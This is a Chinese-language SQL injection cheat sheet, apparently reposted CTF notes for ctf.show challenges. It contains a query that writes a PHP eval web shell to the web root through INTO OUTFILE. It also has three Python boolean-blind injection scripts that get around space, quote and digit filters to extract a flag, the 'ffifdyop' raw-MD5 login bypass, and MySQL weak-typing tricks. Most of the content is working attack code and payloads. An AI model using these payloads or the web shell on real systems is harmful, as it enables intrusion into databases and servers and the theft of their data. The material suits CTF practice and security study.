SQL注入-1
阿新 • • 發佈:2022-04-04
過濾某些字元
使用Replace進行替代
如過濾數字
select username, replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password, 0, '!'), 1, '@'), 2, '#'), 3, '$'), 4, '%'), 5, '^'), 6, '&'), 7, '*'), 8, '('), 9, ')') from user;
直接寫shell
SELECT 1, '<?php @eval($_POST[x]);?>' INTO OUTFILE '/var/www/html/1.php'
bool盲注小指令碼
無空格
import requests import time def get_response(result): url = 'http://e952e288-3d6c-4c73-9f3c-9bdf904827d5.challenge.ctf.show/select-waf.php' payload = "`ctfshow_user`where`pass`regexp'^{}'" dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}' data = { 'tableName': payload } for word in dic: data['tableName'] = payload.format(result + word) response = requests.post(url, data=data) time.sleep(0.25) if response.text.find('$user_count = 1;') > 0: result += word return result if __name__ == '__main__': result = '' for i in range(55): result = get_response(result) print(result)
有空格無引號
import requests import time def str2hex(string): result = '' for word in string: result += hex(ord(word)) return result.replace('0x', '') def get_response(result): url = 'http://61dea855-662d-4843-bd43-4518d01c80f6.challenge.ctf.show/select-waf.php' payload = "ctfshow_user group by pass having pass regexp(0x{})" dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}' data = { 'tableName': payload } for word in dic: data['tableName'] = payload.format(str2hex(result) + str2hex(word)) response = requests.post(url, data=data) time.sleep(0.25) if response.text.find('$user_count = 1;') > 0: result += word return result if __name__ == '__main__': result = '' for i in range(55): result = get_response(result) print(result)
有空格無引號無數字
import requests
import time
true_dict = {
'0': 'false',
'1': 'true',
}
for i in range(2, 10):
true_dict[str(i)] = true_dict['1'] + '+true' * (i - 1)
def word2char(word):
num = str(ord(word))
result = 'char(concat('
for i in range(len(num)):
if i == 0:
result += '(' + true_dict[num[i]] + ')'
else:
result += ',(' + true_dict[num[i]] + ')'
result += '))'
return result
def sentence2true(string):
final_pass = ''
if string:
for i in range(len(string)):
if i == 0:
final_pass += word2char(string[i])
else:
final_pass += ',' + word2char(string[i])
final_pass += ''
return final_pass
def get_response(result):
url = 'http://283b4efa-e5be-454c-8b79-58af5d20673d.challenge.ctf.show/select-waf.php'
payload = "ctfshow_user group by pass having pass regexp(concat(char(concat((true+true+true+true+true+true+true+true+true),(true+true+true+true))),{}))"
dic = 'ctfshow{034e69f-a87bdgijklmnpqruvxyz125_}'
data = {
'tableName': payload
}
for word in dic:
data['tableName'] = payload.format(sentence2true(result + word))
response = requests.post(url, data=data)
time.sleep(0.25)
if response.text.find('$user_count = 1;') > 0:
result += word
return result
if __name__ == '__main__':
result = ''
for i in range(55):
result = get_response(result)
print(result)
ffifdyop 繞過
經過md5加密後:276f722736c95d99e921722cf9ed621c
再轉換為字串:'or'6<亂碼> 即 'or'66�]��!r,��b
用法
select * from admin where password=''or'6<亂碼>'
就相當於select * from admin where password=''or 1 實現sql注入
MySQL弱型別
select pass from ctfshow_user where username = 0;
# 返回所有字母開頭的字串
select pass from ctfshow_user where username = 1;
# 返回所有有且僅以1開頭的字串